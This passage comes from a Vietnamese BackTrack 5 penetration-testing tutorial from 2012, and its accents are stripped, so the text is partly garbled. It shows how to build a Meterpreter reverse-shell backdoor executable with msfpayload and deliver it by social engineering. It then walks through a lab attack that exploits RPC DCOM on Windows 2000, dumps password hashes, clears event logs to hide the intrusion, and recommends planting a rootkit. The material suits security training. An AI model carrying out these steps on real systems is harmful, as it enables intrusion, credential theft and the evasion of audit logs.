c c id ca tin trnh trong BackTrack 5 chng ta s dng cu lnh ps aux trong mi
trng Cymothoa shell .

Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 22

3. Meterpreter c phi l backdoor :
Trong phn trc chng ta c gii thiu s qua v meterpreter nh l mt phn khng th
thiu ca b cng c Metasploit Framework, n c dng thu thp thng tin v to 1 phin lm
vic trong mi trng shell ca h thng victim .Trong phn ny chng ta s c gii thiu s dng
meterpreter nh mt backdoor trong BackTrack 5 .
Cu lnh s dng :


/opt/framework/msf3/msfpayload [<options>] <payload> [actions]


y l cch m cc attacker mun quay tr li h thng ca victim nhiu ln, m khng cn
victim phi click hay thc thi mt m c no c .Anh em cn phi hiu thc s v Metasploit v
Meterpreter, c th tham kho cun hng dn s dng Metasploit ( s c cung cp trong thi
gian sm nht ) v cc phn hng dn trc v BackTrack 5 ca cutynhangheo .

Hnh 22 : To mt backdoor exe s dng msfpayload .

Trong hnh 22 anh em c th thy c file exploit.exe, y l m c ca msf meterpreter
payload c to ra bng cu lnh msfpayload .Tip tc trong phn hng dn ny, chng ta s to
ra 1 backdoor lun lun lng nghe cng 4444 vi phng php payloads, h thng ca victim s
lun lun kt ni v a ch ca attacker 192.168.13.132 trn cng 4444 .

Hnh 23 : Handler c to ra trong Metasploit lng nghe backdoor .

S dng Metasploit, to ra mt handler v thit lp cc ty chn LHOST v LPORT trong
msfpayload console .Sau khi thc hin xong, ch cn chy exploit .Exploit ny c th chy trn bt
c mt mc tiu no .Bt c khi no victim click ln file ny anh em c th gi cho victim bng
cch s dng k thut social engineering hay bt k mt phng php tr hnh no cng c n s
lng nghe LHOST v kt ni ngc v attacker thng qua LPORT .Ngay lp tc khi victim thc thi
Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 23

file ny trn h thng ca h, meterpreter shell s khi to ngay lp tc mt kt ni tc th .Lc ny
anh em cng c th hnh dung ra attacker c th lm iu g ri hen .


Hnh 24 : H thng victim b truy cp bi BT5 thng qua backdoor .

4. Li dng l hng c backdoor :
Backdoor l mt knh kt ni b mt vo h thng .Cc attacker c th truy cp khng b hn ch
vo h thng victim bng cch s dng cc backdoor, phng php ny s tit kim thi gian v cc
n lc ca k thut tn cng ban u .iu quan trng pentester l cn phi thc nghim xm
nhp h thng v tin hnh nh gi xem h thng c d dng b chim quyn iu khin bi
backdoor hay khng, ngn nga vic truy cp tri php ny pentester c th s dng cc bn v
li ph hp cho h thng .
Cc l hng ph bin nht hin nay to iu kin cho vic tn cng v chim quyn iu khin
ca backdoor l li trn b m, cross-site scripting ( XSS ) v qun tr t xa .Phng php phng
v ph bin nht bao gm thng xuyn thay i chnh sch bo mt da trn cc kch bn c th xy
ra gim thiu mi e doa c th gy thit hi cho c quan, t chc, thc hin phng php kim
sot s an ton ca phn mm thng xuyn v phi ng theo tiu chun bo mt trong lp trnh,
cn phi m bo chc chn kim tra mc bo mt v mt ng dng v phi thc hin sa i cc
vn mt cch thng xuyn .
Trong phn hng dn ny, chng ta bit c lm th no s dng k thut n mnh trong
cc cuc tn cng v xm nhp .Trong phn hng dn k tip cng l phn kt thc trong series
hng dn s dng BackTrack 5, cutynhangheo s trnh by mt cuc tn cng da trn mt kch bn
gi nh v s s dng BackTrack 5 thc hin, cuc tn cng gi nh ny s s dng tt c cc
phng php v k thut c gii thiu cc phn trn .







Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 24

Phn V : Chi tit mt cuc tn cng gi nh
Trong bn phn trc ca cun hng dn s dng BackTrack 5, cutynhangheo gii thch chi tit
tng giai on ca qu trnh thc nghim xm nhp .Phn cui cng ny chng ta s c ng li tt c t
trc cho n by gi, v chng ta s c ci nhn nhn khch quan v cc kha cnh khc nhau ca o
c hacking v thc nghim xm nhp .
i vi phn hng dn ny, chng ta cn thit lp mt h thng lab nh sau : 1 my o chy
Windows 7, 1 my o chy BackTrack 5 v 1 s my o chy cc Windows khc .Chng ta s i qua tng
bc ca qu trnh tn cng v c gng xm nhp vo h thng mng ny nh .
1. B cng c Autoscan Network trong BackTrack 5 :
Sau khi kt ni vo h thng mng, bc u tin chng ta cn scan cu trc h thng mng v
kim tra xem cc h thng ang live trong h thng mng . thc hin vic ny, chng ta s
dng b cng c Autoscan Network trong BackTrack 5 .ng dn n b cng c nh sau :

Application Backtrack Information gathering Network analys Network scanners
Autoscan .

Hnh 25 : Autoscan Network 1.5 .

Nh hnh 25 th Autoscan Network 1.5 l mt b cng c c tnh nng scan cu trc h thng
mng, n s lit k tt c cc a ch IP ang c s dng, chi tit v hostname, users v cc h iu
hnh ang hot ng trn h thng mng .
Nh cc phn hng dn trn, anh em c th s dng Nmap lm vic ny cng c .Trc
khi thc hin tn cng, chng ta s thc hin bc phn tch l hng trn mc tiu cn tn cng .
Gi s mc tiu ca chng ta c a ch IP l 192.168.13.129, ang s dng h iu hnh
Windows 2000 server, chng ta c th s dng Nessus hay OpenVAS kim tra l hng ca h iu
hnh ny .Tuy nhin trong phn hng dn ny, cutynhangheo mun anh em nn s dng phng
php kim tra l hng bng tay nh .

2. Ti nguyn l hng trc tuyn :
Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 25

Website cung cp cc thng tin v l hng ph bin nht nh National Vulnerability Database ti
a ch http://web.nvd.nist.gov/view/vuln/search cung cp cc thng tin v cc l hng khc nhau
cho mt h thng c th .

Hnh 26 : National Vulnerability Database Search .

3. Pentest mc tiu :
Trong phn hng dn ny, cutynhangheo s s dng l hng trong Windows 2000 Server l
l hng RPC DCOM port cho php thc thi m t xa, dn n vic lm trn b m ca h thng
.Trong phn hng dn Metasploit, chng ta bit cch lm th no khai thc cc l hng trn
mc tiu .N s khi to 1 meterpreter shell trn h thng Windows 2000 Server c IP l
192.168.13.129, nh hnh 27 bn di .BackTrack 5 cn cung cp b cng c nh SET, c th c
s dng xm nhp h thng .

Hnh 27 : Bn trong h thng Windows 2000 Server .

Mt khi chng ta xm nhp vo bn trong h thng c, thng tin chi tit v h thng ta c
th thu thp c .Sau y l mt s lnh quan trong thc hin vic :

3.1. Hashdump : y l cu lnh dng dump password hashes ( NT/LM ) ca h thng mc
tiu, thng tin ny c dng crack password v sau leo thang c quyn trn h thng
mc tiu .
3.2. Sysinfo : y l cu lnh dng thu thp thng tin chi tit v h thng mc tiu nh l h
iu hnh, nh cung cp, tn admin v nhiu th khc .
Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 26

3.3. Execute : y l cu lnh cc k mnh, dng thc thi chng trnh hay file trn h thng
mc tiu .
3.4. Portfwd : y l cu lnh rt mnh, dng thc thi mt dch v trn mt port ch nh trn
h thng mc tiu .N c th s dng to ra backdoor trong tng lai .

4. Xa b du vt :
Phn ny s c ng vn xa b du vt ca cuc tn cng trn h thng mc tiu .Mt cch
n gin cu lnh clearev dng xa cc event logs trong h thng, khng li bt k du vt no
th hin s truy cp tri php .

Hnh 28 : Clearev

Phn qun l logs trn h thng mc tiu .

Hnh 29 : Event logs trong Windows 2000 Server .

Lnh clearev s xa b cc logs v khng li bt k mt du vt xm nhp tri php no trn
h thng .Tuy nhin, vi mt admin sc so v c nhiu kinh nghim th h ngay lp tc s nghi ng
v c ci g bt n khi ton b logs u b xa sch .V vy, chng ta nn ci bookdoor hoc
rootkit c th quay li victim bt k lc no .

5. Tng quan v m hnh bo mt Windows :
M hnh bo mt ca Windows kh n gin .Mi ngi dng c 1 SID duy nht .SID s c dng
nh sau :


Ti liu hng dn s dng BackTrack 5 Ting Vit 2012

Ngi bin dch : cutynhangheo@gmail.com Trang 27


S-1-5-21-9867453210-2389765341-23768956-1023



Red - Revision level
Green Identified Authority Value
Orange Domain or local ID
Peach Relative ID